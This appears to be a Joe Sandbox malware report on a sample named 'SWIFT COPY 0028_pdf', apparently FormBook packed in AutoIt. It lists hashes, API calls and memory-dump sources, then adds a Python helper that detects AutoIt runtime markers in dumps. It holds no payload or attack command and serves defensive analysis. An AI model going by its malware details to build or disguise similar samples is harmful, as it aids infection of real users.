                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: e1a2221d7c82d0192db052041b6bad9b6e4c3e9eb3c4438fac9003abf22932dc
                                                                                    • Instruction ID: d8824d756cc17b2108b7074bc72454aba103679b9b2341b7aff613f1cceb5729
                                                                                    • Opcode Fuzzy Hash: e1a2221d7c82d0192db052041b6bad9b6e4c3e9eb3c4438fac9003abf22932dc
                                                                                    • Instruction Fuzzy Hash: 8411A0B2641221BBDB358F51C888FFBFAACFF06765F10C62AF55996181E3706940D6E0
                                                                                    APIs
                                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
                                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0097A88B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 3832099526-2422070025
                                                                                    • Opcode ID: 9fcf27a5dd9b874218ae619821d961902e74a15a7319a9910cee001f9e5efc22
                                                                                    • Instruction ID: 34d3aef418ee73d5c695f3b72120bdc95cdec2088f24aea45b468f47d60fa735
                                                                                    • Opcode Fuzzy Hash: 9fcf27a5dd9b874218ae619821d961902e74a15a7319a9910cee001f9e5efc22
                                                                                    • Instruction Fuzzy Hash: 3D01C0B6200304ABCB20EFA8D886BEDB368EF85314F10C426F61A9B3D1D771E8058752
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0095B7EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 8f4c1209ff3049a3ae874cca02a52997ea311fc06e9f505d71e13b98e65d40be
                                                                                    • Instruction ID: d070a09834e85e8099d31baae9007bf89e302bae71bf5a9d6bf642f3b9cdac2a
                                                                                    • Opcode Fuzzy Hash: 8f4c1209ff3049a3ae874cca02a52997ea311fc06e9f505d71e13b98e65d40be
                                                                                    • Instruction Fuzzy Hash: C401D4B1641128ABCB04EBA4DC52AFE336DBF96350B04061DF862A72D6EB745D0CC7A0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0095B6EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 5f850b7233ab47b0e8d47530c8f24cacdc9ffe359d373817b550dc7a5a60364e
                                                                                    • Instruction ID: c0135be1c9dd15040988088d19b83092be5ade55a821b063fd92db4f78ff6c4a
                                                                                    • Opcode Fuzzy Hash: 5f850b7233ab47b0e8d47530c8f24cacdc9ffe359d373817b550dc7a5a60364e
                                                                                    • Instruction Fuzzy Hash: 7201FDB1642008ABCB04EBA5D912BFF33AC9F95345F10002AB902B32C6EB945E0C87B5
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0095B76C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: a14c94782b3e9edfa08fa9e8fc78bcf314e98ff818c5534a812f854d223f84ba
                                                                                    • Instruction ID: a8c289be2c222994e4841c9e6c6fb8b35eb2a68c30811f2344d8257976c4407c
                                                                                    • Opcode Fuzzy Hash: a14c94782b3e9edfa08fa9e8fc78bcf314e98ff818c5534a812f854d223f84ba
                                                                                    • Instruction Fuzzy Hash: 1901ADB6641114ABDB00EBA4D902BFE73AC9B99345B10002AB802B3696EB645E0D87B5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: cd0ef7e515f72df6d4d74728f13272fc71ab5c67412e506ed53cbe5f8de9b03c
                                                                                    • Instruction ID: adb40a7462b7eac4aa2b6ddcdb0e83b056629fc62846c7547c2562f49ff0cf2a
                                                                                    • Opcode Fuzzy Hash: cd0ef7e515f72df6d4d74728f13272fc71ab5c67412e506ed53cbe5f8de9b03c
                                                                                    • Instruction Fuzzy Hash: 3BE0927760432467D710AAA5DC4AE8BFBACAB91764F004166B905D3181E660EA4187D0
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0095A63F
                                                                                      • Part of subcall function 009413F1: _doexit.LIBCMT ref: 009413FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 7dd05cb5b805b445533c5d67ee40c0aaccc87cadc516f4ca71fcabc30586604f
                                                                                    • Instruction ID: 45e5bf6c028d03c0892d7c7bf56386bd9afbb645054295b045a5f6c25bcc5558
                                                                                    • Opcode Fuzzy Hash: 7dd05cb5b805b445533c5d67ee40c0aaccc87cadc516f4ca71fcabc30586604f
                                                                                    • Instruction Fuzzy Hash: BDD02B313C532833C21036D83C17FC4354C8F95B65F040022BB0C955C24DE2C98002DD
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0099ACC0
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0099AEBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 510247158-3257408948
                                                                                    • Opcode ID: 045655a968c86c3a003ba1835950326491d0698a680655116d067788d7ce4048
                                                                                    • Instruction ID: dfa9d82ff2319362be9f8bd4c4d71fd074cdfe2e91dd11b4064c6af15f937736
                                                                                    • Opcode Fuzzy Hash: 045655a968c86c3a003ba1835950326491d0698a680655116d067788d7ce4048
                                                                                    • Instruction Fuzzy Hash: 9CE06D70C18109EFCF15DBA9D984AECBBBCEF58300F108481E052B6560EB354A84EF62
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009886A2
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009886B5
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 3edecea96aafb6404a78c4dbf9de936d9b5622a6aa42a96349ee883620eded2f
                                                                                    • Instruction ID: 77a6e98d5a6826bcb30314ba4ec51c79e97dc7bc2f6541adc3a0e28a7d3361df
                                                                                    • Opcode Fuzzy Hash: 3edecea96aafb6404a78c4dbf9de936d9b5622a6aa42a96349ee883620eded2f
                                                                                    • Instruction Fuzzy Hash: 82D012317A9314B7F26867B0AC0BFC67A189F45B15F104815B74AAA1D0C9E0E940D794
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009886E2
                                                                                    • PostMessageW.USER32(00000000), ref: 009886E9
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: a8b2c2b83b05b08a375796f905b7a5c30f5a94b551885245c98fd1e13d4a2f8d
                                                                                    • Instruction ID: 058e5300113db417b0dca0dc39e8af8090b81a68db8f86a7a9e00abbd9a68b13
                                                                                    • Opcode Fuzzy Hash: a8b2c2b83b05b08a375796f905b7a5c30f5a94b551885245c98fd1e13d4a2f8d
                                                                                    • Instruction Fuzzy Hash: 21D012317DA3147BF26867B0AC0BFC67A189F45B15F104815B74AEA1D0C9E0E940D795
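The function listings above are AutoIt runtime code rather than the FormBook payload: the MessageBoxW call is the runtime's allocation-failure dialog (caption AutoIt, text Error allocating memory., flags 0x10 = MB_ICONHAND), and the two FindWindowW/PostMessageW functions post WM_COMMAND (0x111) to the Shell_TrayWnd taskbar window, the pattern AutoIt's built-in window functions use. Because the W variants of these APIs are called, the literals are stored as UTF-16LE in the image, so an ASCII-only strings pass misses them. The Python below is an added triage helper, not code from the Joe Sandbox report or from the AutoIt project: it extracts UTF-16LE strings from a byte image and checks for these markers, which is one way to back the report's "Binary is likely a compiled AutoIt script file" verdict from a memory dump. The marker list, the two-hit threshold and the sample images are assumptions constructed for the example.

```python
import re

# Markers visible in the function listings of this report (MessageBoxW caption
# and text, and the window class passed to FindWindowW). Using exactly these
# three, and requiring two hits, is an assumption made for triage.
AUTOIT_MARKERS = ("AutoIt", "Error allocating memory.", "Shell_TrayWnd")


def wide_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Return printable UTF-16LE strings (ASCII range) of at least min_len chars.

    The W-suffixed APIs in the listings take wide strings, so each literal sits
    in the image as one ASCII byte followed by a 0x00 byte per character.
    """
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def autoit_markers_present(data: bytes) -> dict[str, bool]:
    """Map each marker to whether it occurs inside any extracted wide string."""
    found = wide_strings(data)
    return {marker: any(marker in s for s in found) for marker in AUTOIT_MARKERS}


def looks_like_autoit(data: bytes, min_hits: int = 2) -> bool:
    """Flag an image when at least min_hits markers are present (threshold assumed)."""
    return sum(autoit_markers_present(data).values()) >= min_hits


def _wide(s: str) -> bytes:
    """Encode s as a NUL-terminated UTF-16LE literal, as a compiler stores it."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a memory dump: filler bytes around the wide literals.
# A narrow copy of Shell_TrayWnd is included on purpose; it must not count.
SAMPLE_IMAGE = (
    b"MZ" + b"\x90" * 30
    + _wide("Error allocating memory.")
    + b"\x8b\xff\x55\x8b\xec"
    + _wide("AutoIt")
    + b"Shell_TrayWnd"
    + b"\xcc" * 8
    + _wide("Shell_TrayWnd")
    + b"\x00" * 16
)

# Constructed negative: only a narrow (ASCII) copy of one marker, no wide strings.
CLEAN_IMAGE = b"MZ" + b"\x00" * 40 + b"Error allocating memory." + b"\x00" * 8


if __name__ == "__main__":
    for name, image in (("sample", SAMPLE_IMAGE), ("clean", CLEAN_IMAGE)):
        print(name, autoit_markers_present(image), looks_like_autoit(image))
```

Run it against a dumped image (for this report, the 00920000-based .sdmp files listed under Memory Dump Source) by reading the file into `bytes` and calling `looks_like_autoit`. The helper deliberately scans only UTF-16LE, because that is the encoding the listed W APIs consume; a full triage pass also runs the ordinary narrow-string extraction. A positive result only confirms the AutoIt runtime wrapper, not the injected FormBook code, which has to be examined in the target process it is written into.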